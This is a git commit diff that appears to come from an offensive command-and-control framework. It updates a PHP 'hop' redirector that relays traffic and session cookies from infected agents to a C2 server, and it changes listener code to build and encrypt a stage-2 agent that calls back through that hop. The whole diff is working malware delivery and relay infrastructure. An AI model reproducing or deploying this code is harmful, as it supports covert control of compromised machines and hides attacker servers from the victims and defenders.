parent
619ae2c132
commit
6c3f51aca9
|
@ -1,18 +1,22 @@
|
|||
<?php
|
||||
|
||||
$server = rtrim("REPLACE_SERVER", '/');
|
||||
$hopName = "REPLACE_HOP_NAME";
|
||||
|
||||
|
||||
function do_get_request($url, $optionalHeaders = null)
|
||||
{
|
||||
global $hopName;
|
||||
$aContext = array(
|
||||
'http' => array(
|
||||
'method' => 'GET'
|
||||
),
|
||||
);
|
||||
$headers = array('Hop-Name' => $hopName);
|
||||
if ($optionalHeaders !== null) {
|
||||
$aContext['http']['header'] = $optionalHeaders;
|
||||
$headers['Cookie'] = $optionalHeaders;
|
||||
}
|
||||
$aContext['http']['header'] = prepareHeaders($headers);
|
||||
$cxContext = stream_context_create($aContext);
|
||||
echo file_get_contents($url, False, $cxContext);
|
||||
}
|
||||
|
@ -20,13 +24,16 @@ function do_get_request($url, $optionalHeaders = null)
|
|||
|
||||
function do_post_request($url, $data, $optionalHeaders = null)
|
||||
{
|
||||
global $hopName;
|
||||
$params = array('http' => array(
|
||||
'method' => 'POST',
|
||||
'content' => $data
|
||||
));
|
||||
$headers = array('Hop-Name' => $hopName);
|
||||
if ($optionalHeaders !== null) {
|
||||
$params['http']['header'] = $optionalHeaders;
|
||||
$headers['Cookie'] = $optionalHeaders;
|
||||
}
|
||||
$params['http']['header'] = prepareHeaders($headers);
|
||||
$ctx = stream_context_create($params);
|
||||
$fp = @fopen($url, 'rb', false, $ctx);
|
||||
if (!$fp) {
|
||||
|
@ -39,11 +46,24 @@ function do_post_request($url, $data, $optionalHeaders = null)
|
|||
echo $response;
|
||||
}
|
||||
|
||||
function prepareHeaders($headers) {
|
||||
$flattened = array();
|
||||
|
||||
foreach ($headers as $key => $header) {
|
||||
if (is_int($key)) {
|
||||
$flattened[] = $header;
|
||||
} else {
|
||||
$flattened[] = $key.': '.$header;
|
||||
}
|
||||
}
|
||||
|
||||
return implode("\r\n", $flattened);
|
||||
}
|
||||
|
||||
if ($_SERVER['REQUEST_METHOD'] === 'GET') {
|
||||
$requestURI = $_SERVER['REQUEST_URI'];
|
||||
if(isset($_COOKIE['session'])) {
|
||||
return do_get_request($server.$requestURI, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
return do_get_request($server.$requestURI, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
}
|
||||
else {
|
||||
return do_get_request($server.$requestURI);
|
||||
|
@ -56,7 +76,7 @@ else {
|
|||
$postdata = file_get_contents("php://input");
|
||||
|
||||
if(isset($_COOKIE['session'])) {
|
||||
return do_post_request($server.$requestURI, $postdata, "Cookie: session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
return do_post_request($server.$requestURI, $postdata, "session=".str_replace(' ', '+', $_COOKIE['session']));
|
||||
}
|
||||
else {
|
||||
return do_post_request($server.$requestURI, $postdata);
|
||||
|
|
|
@ -747,8 +747,16 @@ def send_message(packets=None):
|
|||
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
|
||||
dispatcher.send("[*] Sending agent (stage 2) to %s at %s" % (sessionID, clientIP), sender='listeners/http')
|
||||
|
||||
hopListenerName = request.headers.get('Hop-Name')
|
||||
try:
|
||||
hopListener = helpers.get_listener_options(hopListenerName)
|
||||
tempListenerOptions = copy.deepcopy(listenerOptions)
|
||||
tempListenerOptions['Host']['Value'] = hopListener['Host']['Value']
|
||||
except TypeError:
|
||||
tempListenerOptions = listenerOptions
|
||||
|
||||
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
|
||||
agentCode = self.generate_agent(language=language, listenerOptions=listenerOptions)
|
||||
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions)
|
||||
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
|
||||
# TODO: wrap ^ in a routing packet?
|
||||
|
||||
|
|
|
@ -440,6 +440,7 @@ def send_message(packets=None):
|
|||
f.close()
|
||||
|
||||
hopCode = hopCode.replace('REPLACE_SERVER', redirectHost)
|
||||
hopCode = hopCode.replace('REPLACE_HOP_NAME', self.options['Name']['Value'])
|
||||
|
||||
saveFolder = self.options['OutFolder']['Value']
|
||||
for uri in uris:
|
||||
|
|
Loading…
Reference in New Issue